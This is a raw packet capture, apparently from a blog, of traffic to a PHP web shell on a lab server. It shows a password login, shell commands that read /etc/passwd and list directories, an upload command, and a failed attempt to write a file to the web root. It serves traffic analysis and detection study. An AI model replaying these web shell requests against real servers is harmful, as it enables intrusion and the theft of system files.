E…IY@…+….h…d.i.P.`d$.&ZzP..@.C..POST /shells/ajaxphp.php HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 17
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.1.100
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

p4ssw0rD=password
2015-02-11 18:04:42.701791 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [.], ack 640, win 239, length 0
E..(..@.@.,….d…h.P.i.&Zz.`f.P….7..
2015-02-11 18:04:42.703527 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [.], seq 1:2921, ack 640, win 239, length 2920
E…..@.@.!z…d…h.P.i.&Zz.`f.P…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:04:42 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3018
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

………..Z{s.6……oR.cY.;…r..4.I&….Wu2. Y.)………… -.V…)…a..’..\-.qc…..D,.4….E../.=?h….{.^.;….p.h._.ZE..U.F.b…..7n..E..<.”_..>S!C&..H…F…….L.j….\…
..G.fj=K…>…].@DB…..c.ip}%E…..8.J……9.+.1…9.-eyVL..0…………(Q..d1..5.5x.d…@%..5..^…5_Q.V…..w…|]…s…..\……..@H….$.1C.FC.i.Z*l…(-$.E4IA…….I*”..sME…….v..v…..’…/……U?…..’
<v…JL.Ys.k(.l.b.~<.r..LTh.` m….7T..)09.!#.y…~.y..\….I….$cqs….Sg.)..b.4bx…,l….m.8f….7.R.k.V.ymD0…i.D..6S P.*d.Sl.#…..<.
..<…t…\4……H…%..Q..Lbo.a…….g..l….;.&6……O……O/}d.C1q7.J%.$.w.R.hF#4.b..z…]\.7..LF-.PI..-.].D.c..g.i……@ea.m….%..5QR……$..[.`..X4..7I..6h.cz…..#..u.| ..a..M?..
…….B…….@…..3….`N.V….S.:@.H….`.T0…Xu?ra.
h..j.’4..”.]T1b. .SE….H.2………E….Q.-..A…..t)Sv._C).d.;………”.M…:.vn….>..}.d`.!..mP..J.=.<….Qb.m.%.”…..g9.o.w.-….BgGGG.JD.R%1…)…..w4+….I.X..:……e…=.f….$…6..b………F….Z…-.k…..6.{..N.x8..
.G.lF B.<.}EP…C.
….Cb0_…3……1…E…..X2L.He…*w.a..A..F.D..W..N8..T.M.E.X.*.. lb..m%…?..4..9. v4….r2zu:.\N<“..\…7fT.K#.7…..O……..|.f.?.. …..z.$O…..Qoh.h..3…d.#.z_..uF7.}.s.\.\AZ…Q9g..f…,..i].v……Q……….-..M..d.
.. t
..V.n……pg.F..\.E.E.a!\A>P,….a….tD..p.4..r..<q.+..0….L.|.G.@i”..]B.&{`……..].].N?..e..0..f.sw.y……”Ap..k.%..X..<m.!…0.p…NV.S,…v<..<]..!uN..(2u]EK.b.o..Z… ?~.v…LM.u.F…~;…..2..Gd..U1,..2Qf.z………^..:.C:.yv..S.l…….0.m..&X O…0….ag:……I…fV.N…..8…x..v..uZ..Tc_…-:..fI$h.b..7#~Y….bOg……….$)……+……..e.O+…s2..”…QZ…*..c|#.#P….)….G….!.=..o_~………..z….3=}.#…\@.$…f..~..y.B$..L………w1…M^..F….o..R.k….|’…m.)….6.M..i’….g..+4k…Ro….{.W………..v:)……..-…)…qaJ%….e.n.-b..0…..{..F……..1.3.7.-b*.2erM…@. …od1…*7.g3m…..F..G”…<.~..BP..B…7…..uj…bJM.FS..Z….*Wv…. .. ..,k..|.*..9..B…!……..a.t….y…r…k.NA…….<4…………nV.)…..zn.F…ep…..7HP…c.@D…Kp.!…..nq……W…;.m.u..zgz..==……~.3`.2.!k.A{.;5~….l….iG.}.n..^…………..>
.M#.-.c#……3…h9.`+../o….&….G….nd……….>F…x.D2n4.<…4..~4………z…i…..CM…T^…x’4.. …D.C…x.4…..<….1’o..*…h.ii….4:F..b.S.:Xq..`4.AgE1…s……./?..g./. .Q..Ll.O….m…)..SA’..i.n…3nN………*…3.}…=..\I..}N0…..>.c…..KS.i.$……..m…@..TQ……@…’:……..}Q….. |z..l.w….D….::.{..C..>..A5..
2015-02-11 18:04:42.703679 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [P.], seq 2921:3431, ack 640, win 239, length 510
E..&..@.@.*….d…h.P.i.&e..`f.P….5…_…|!.0..;….9q]..l].{…\…)…/.?…>’…ZjS.”.tE.$………..n….Wo)\/…Nu..2.D…IcH.\….RI……s ..K.x3d?H’.O………#…;4.~…G……v…..P.p..o1.
……Bi..-..U.f.c.D.d…l..-……..JK..m.[….Q..7]t.vz…..u..u5.%.m.4..G0.}.V…<S….w.:..A}U>….B.R.7…U7r…/….{…..N.P.%{$…./.yu…&4`.D..sM./l……….,..g……….C…E.A…7…s.O.5u…W….’…~./..fQ….$.v….=..P_..z………..P…’……………….S.yZ.u….f.T……..s.kd..uKi…..:..zwu..:..9z. …. ..\.l….
.+.#..
2015-02-11 18:04:42.711577 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [.], ack 3431, win 64, length 0
E..(IZ@….Y…h…d.i.P.`f..&g.P..@i………
2015-02-11 18:04:47.705264 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [F.], seq 3431, ack 640, win 239, length 0
E..(..@.@.,….d…h.P.i.&g..`f.P….7..
2015-02-11 18:04:47.811352 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [.], ack 3432, win 64, length 0
E..(I[@….X…h…d.i.P.`f..&g.P..@i………
2015-02-11 18:04:55.286569 IP 192.168.1.104.62057 > 192.168.1.100.80: Flags [F.], seq 640, ack 3432, win 64, length 0
E..(I\@….W…h…d.i.P.`f..&g.P..@i………
2015-02-11 18:04:55.286617 IP 192.168.1.100.80 > 192.168.1.104.62057: Flags [.], ack 641, win 239, length 0
E..(9.@.@.}….d…h.P.i.&g..`f.P…i…
2015-02-11 18:05:11.060023 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [S], seq 1595314139, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4I`@….G…h…d.j.P_……… ..F…………..
2015-02-11 18:05:11.060073 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [S.], seq 335131994, ack 1595314140, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.@……d…h.P.j…Z_…..r..C…………..
2015-02-11 18:05:11.065860 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
E..(Ia@….R…h…d.j.P_……[P..@.u……..
2015-02-11 18:05:11.066160 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [P.], seq 1:453, ack 1, win 64, length 452
E…Ib@…,….h…d.j.P_……[P..@.o..GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:11.066209 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [.], ack 453, win 237, length 0

2015-02-11 18:05:11.067293 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [P.], seq 1:625, ack 453, win 237, length 624
E…Z.@.@.Z<…d…h.P.j…[_…P…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:11 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

……….u.A..0.E………jR{.7….B`..xv..I..7/….?.2.o[.nc….v.0LU…2…H..o:………[.*I……=.0…]r………r&.fJ.d……r..c@..%zjO.#m.,….b….OE}.#.#.:.R.%[…..`. 9…x..%.(..r…:p..UJ?….n.H….
2015-02-11 18:05:11.143502 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [.], ack 625, win 62, length 0
E..(Ic@….P…h…d.j.P_…….P..>|C……..
2015-02-11 18:05:16.068811 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [F.], seq 625, ack 453, win 237, length 0
E..(Z.@.@.\….d…h.P.j…._…P….7..
2015-02-11 18:05:16.180013 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [.], ack 626, win 62, length 0
E..(Id@….O…h…d.j.P_…….P..>|B……..
2015-02-11 18:05:16.486016 IP 192.168.1.104.138 > 192.168.1.255.138: NBT UDP PACKET(138)
E…t…..@….h……….p……..h…… FCFJDEFHEOCNFEEBECECFJCACACACAAA. ABACFPFPENFDECFCEPFHFDEFFPFPACAB..SMB%…………………………,……………….,.V………=.\MAILSLOT\BROWSE…….WORKGROUP.8…:..
….:…RY4WN-TABBY.
2015-02-11 18:05:23.537614 IP 192.168.1.104.62058 > 192.168.1.100.80: Flags [F.], seq 453, ack 626, win 62, length 0
E..(If@….M…h…d.j.P_…….P..>|A……..
2015-02-11 18:05:23.537661 IP 192.168.1.100.80 > 192.168.1.104.62058: Flags [.], ack 454, win 237, length 0
E..(N.@.@.h!…d…h.P.j…._…P…{…
2015-02-11 18:05:23.537670 IP 192.168.1.104.62059 > 192.168.1.100.80: Flags [S], seq 897662518, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Ig@….@…h…d.k.P5.>6…… .d……………
2015-02-11 18:05:23.537691 IP 192.168.1.100.80 > 192.168.1.104.62059: Flags [S.], seq 456804555, ack 897662519, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
E..4..@.@……d…h.P.k.:H.5.>7..r..C…………..
2015-02-11 18:05:23.552774 IP 192.168.1.104.62059 > 192.168.1.100.80: Flags [.], ack 1, win 64, length 0
E..(Ih@….K…h…d.k.P5.>7.:H.P..@`………
2015-02-11 18:05:23.552812 IP 192.168.1.104.62059 > 192.168.1.100.80: Flags [P.], seq 1:446, ack 1, win 64, length 445
E…Ii@…,….h…d.k.P5.>7.:H.P..@….GET /shells/ajaxphp.php?runcmd=upload HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:23.552847 IP 192.168.1.100.80 > 192.168.1.104.62059: Flags [.], ack 446, win 237, length 0
E..(.B@.@..q…d…h.P.k.:H.5.?.P….7..
2015-02-11 18:05:23.554143 IP 192.168.1.100.80 > 192.168.1.104.62059: Flags [P.], seq 1:707, ack 446, win 237, length 706
E….C@.@……d…h.P.k.:H.5.?.P…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:23 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 295
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

……….u..n.0…}
.;.ISCa.mJs….K..0Q..).e…T”B…`~….P….@.B.}K…U…….L. …i.D..V.5….JV.1.j..-…..”..6..f….l,.&{}..E= …v..q……B..O.l.`l.3……….h_….x..wn.c.5.qjffo..c>3.g..c….:M.+…K@..j…f{G.(..s..Jp..UK*..5..d……..%.}.<.7H…v.~..5.!p….?…’)..P.?….G…

2015-02-11 18:05:34.416483 IP 192.168.1.104.62060 > 192.168.1.100.80: Flags [P.], seq 1:451, ack 1, win 64, length 450
E…Ir@…,….h…d.l.P….vt.cP..@`i..GET /shells/ajaxphp.php?runcmd=listdir%20. HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:34.416518 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [.], ack 451, win 237, length 0
E..(.I@.@..i…d…h.P.lvt.c…NP….7..
2015-02-11 18:05:34.422198 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [.], seq 1:2921, ack 451, win 237, length 2920
E….J@.@……d…h.P.lvt.c…NP…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:34 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

………..].S….~…..@g.. ..{.3.(……….(. ….N |x….$Z.Nb.].}.Kve..+YZ.V…q(e………E….y…/../.c. .X.._Ys’a……..+..,..=>…..y”J.u…3.k.7.a..X.O}…g.F2.. e…..`2p|…..+|..[….. .w…v…………zq….G;^…….!…-g..;. ..D…..uq..@>g ……..0.b.[s…f/………… -..A..L.;.i..o..1q..@..g%.P*].q5..}X.^.0..j.
J.3..F..F.E?.a…:.[..AM….z …..#.!.k.1L..j..”J…W…C.3…6W………K..C.&..u[^..b…………….M]j_…6.P+. .K…h0….w…h….[bi]…<\…=…=..d.~.C.%……(….c…..v..e…mr._R.d.0Y..w…F..”.6.j}.`..vyE….B………f….=~…….\.9….r.3F.;.7′.{‘7W’M5&..c.h..:.h.?C………t\.TW.}……..HFw..d..}.f&3.|&…`.Jw….m.K ..’……/…..Z…pUq.{..Xl..E\.p.Q.<.h3G…(…..S.{.C……q…}).+..Ug…U..VG.{..(.
.?..Vs………………R.7g;.
i.h..:.h….D=…..-.$…..P….I[…rA2.\.Cd<JlF..3q.d..W4.@WR…D…./..]….(…T..`.Z.e,>y..|A…….y….~.4..:.4\q>..T…….i”…..>b..E.J9 .<0…..t.75,mM.-.A…z..5i..^………>].u_..X………}c..^#3..:……*X`..(.<4..Z..A…fW.e….”..;.x.c)..m.^R.`.S.0.}…..RF…”… ..Ss….j\………… ^<e.P<.Z.{.}..V.A.#fMQ\.\pU..Y.Y….MK^.E6…P..3.`.d.\A..U…..”A2.\’A.9…:@2Rz..pY….%.yN,q.
h]T..y……….g.~..-e}.5….>..`………….) Q.’RSq…J….j…%+@i..,l. ….r..F…..Y.P.<..N……..l…..MZ…l.R80…..D2……c-fT9.p……..,..Vjm..5..w……u…..O.. …}h…..n.RO ..L…,.;.M….M.Z….0.C..D?…m….$x…G.e.` ZR..O…….?0….e.”.2.HFP…
X..&~#..jq…J.9<.r7..L……..e.T…qcW..:.T.WEo……..5.Z)..b…Bd?…….(.s…9….O……………..8.M, . …0….W.nJ,….b3
r3y../lgHmW..@3…..a.”+C.5..)….s…B..Q..0\…..R….{5.’&.._n`~.^..h.z….N…s..Em….#…+.’…Q.y..M…..+.uR..\-..cq&#.HZ..e]…..?b….)aAD…}…~….Uo…e…_.w.+…….C.m…j.#.<…I7B….F….xF.t..+…d=yW…..E.Yj.v..Y.2./h..G..bb..h…..I…….cw.pC…ILrc……..x/W.D.CR..Ad.b.”3″.DF.$.F-bi.
<\1cg.F.g…Z.9 W..Lb….QK…..W……….A.3wP6].Ds…..G……w….F..J.].x..L+C4……Z….>….FR….2>…+..?..Q.x…`L..I..y…?……W…….].=eY*.\..n..W …S..k….e.L…. .#..?……..:../k9,……..Lv..os@..L6.9\…8…..fHG……’.9…g$……T……….’……:…!.`Du…8….A……..%.w……
.t……….y<…..y$0….._UM..x..(`..T………..r&…3..3….].._..f…W.7″..( […h…Uk.uR..\E.|….&……v.?……(.o*+……2k….q~b….0 m! #..~.8…e=….8.1g.D..G.?.”.H..n…;!F.3.]..o.h..:..e…..#w!.X..2~…x..:..2.=k……>…i[……X.Y.j./1q.lzT.#……D.b.*..g
2015-02-11 18:05:34.422356 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [P.], seq 2921:4141, ack 451, win 237, length 1220
E….L@.@……d…h.P.lvt…..NP………JY.._N4.;9fd….Bu3….X…..v… .Gg2J.0v..@.
..9…y…}..$
…Yz.hv…………Z.*.]WF.ZQ..,…@…V…….o.8b..>…..z@)C…”.Y./…T.,..g.,……~Z!.`]eJ(=n.8J%x…P.y…|8…. `.oAD>.ku..S……….%….9..|b….[@S.R….hE. ..|5…2uE..b..rG.=….>iR….\_.W9^(k .4q…. .o.>….%……>.PGv..@LWFA.!..N.>……?.. /.G<….. `.. b…q…g.XD……pq…Z.\y$p…`.~uC9..g.v….m_..0.k.;……….`…..sn….~…n.H..a..7D1.=……..,.]q>..P…Z.{.].?GmCT..L”Q…………..3.2..=.em……l[……..V.W.pb.{…C.U….;….CA…1…..l..h|.^.W…….H..m……v..:.L)…………|B..X..<…h.V…S..s.b.{…..f…z.].@ ……[.6
‘..d,……..t..b….!c…….M5c….D..+..t.jw…[…a.U
g.#+….[^$._……W.C^.|}…w+P.2ey)…..S….|fH.#………r..
…L.^}….y.Nr….@..K.@/.r.]+.7.y…..$.BB.Ky..H…{.._../..8Vs..A.e. ~…….x.8…….8..I…..M…..m.Sa…&NY*..S..!..%w..”…..<=v.`..O.v…
X[..q………H>.P.In.8….^…….,.Z&….i.~…60.W..VQ.;…..(…h..O…..?.C.=……@….`r..U.J………..o…_y.|n.b.!.Q..U……,t……}q..OG..z……B.
..W>…..+..P.q.!.b….-k.I…..M….m%…..N….i.vF.%…kz..O….~+.:..+….j…..k.=’+…….{.:..f…$:….g..t….Y..W. .y=,{…zy…..O…Q..{…
2015-02-11 18:05:34.435890 IP 192.168.1.104.62060 > 192.168.1.100.80: Flags [.], ack 2921, win 64, length 0
E..(Is@….@…h…d.l.P…Nvt..P..@5………
2015-02-11 18:05:34.488045 IP 192.168.1.104.62060 > 192.168.1.100.80: Flags [.], ack 4141, win 60, length 0
E..(It@….?…h…d.l.P…Nvt..P..<0………
2015-02-11 18:05:39.427403 IP 192.168.1.100.80 > 192.168.1.104.62060: Flags [F.], seq 4141, ack 451, win 237, length 0

2015-02-11 18:05:42.752612 IP 192.168.1.104.62061 > 192.168.1.100.80: Flags [P.], seq 1:600, ack 1, win 64, length 599
E…Iy@…+….h…d.m.P…….2P..@kJ..POST /shells/ajaxphp.php?savefile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 65
Origin: http://192.168.1.100
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

filetosave=/var/www/html/shells/411561.txt&filecontent=wfwerqfrff
2015-02-11 18:05:42.752647 IP 192.168.1.100.80 > 192.168.1.104.62061: Flags [.], ack 600, win 238, length 0
E..(.|@.@..7…d…h.P.m…2…OP….7..
2015-02-11 18:05:42.753420 IP 192.168.1.100.80 > 192.168.1.104.62061: Flags [P.], seq 1:393, ack 600, win 238, length 392
E….}@.@……d…h.P.m…2…OP…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:42 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Nope, can’t chmod nor save :(

2015-02-11 18:05:47.994518 IP 192.168.1.104.62062 > 192.168.1.100.80: Flags [P.], seq 1:453, ack 1, win 64, length 452
E…I.@…,p…h…d.n.PW.]^…#P..@….GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:47.994545 IP 192.168.1.100.80 > 192.168.1.104.62062: Flags [.], ack 453, win 237, length 0
E..(.N@.@..d…d…h.P.n…#W._”P….7..
2015-02-11 18:05:47.995447 IP 192.168.1.100.80 > 192.168.1.104.62062: Flags [P.], seq 1:625, ack 453, win 237, length 624
E….O@.@……d…h.P.n…#W._”P…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:47 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

……….u.A..0.E………jR{.7….B`..xv..I..7/….?.2.o[.nc….v.0LU…2…H..o:………[.*I……=.0…]r………r&.fJ.d……r..c@..%zjO.#m.,….b….OE}.#.#.:.R.%[…..`. 9…x..%.(..r…:p..UJ?….n.H….
2015-02-11 18:05:48.054636 IP 192.168.1.104.62062 > 192.168.1.100.80: Flags [.], ack 625, win 62, length 0
E..(I.@….3…h…d.n.PW._”….P..>……….
2015-02-11 18:05:50.111106 IP 192.168.1.104.62062 > 192.168.1.100.80: Flags [P.], seq 453:905, ack 625, win 62, length 452
E…I.@…,n…h…d.n.PW._”….P..> …GET /shells/ajaxphp.php?runcmd=etcpasswdfile HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Accept: */*
Referer: http://192.168.1.100/shells/ajaxphp.php
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=dn3b2pg86rn1m990dibrngk463
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
2015-02-11 18:05:50.111936 IP 192.168.1.100.80 > 192.168.1.104.62062: Flags [P.], seq 625:1248, ack 905, win 245, length 623
E….P@.@……d…h.P.n….W.`.P…….HTTP/1.1 200 OK
Date: Wed, 11 Feb 2015 22:05:50 GMT
Server: Apache/2.4.10 (Ubuntu)
X-Powered-By: PHP/5.5.12-2ubuntu4.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 213
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

Blog Listings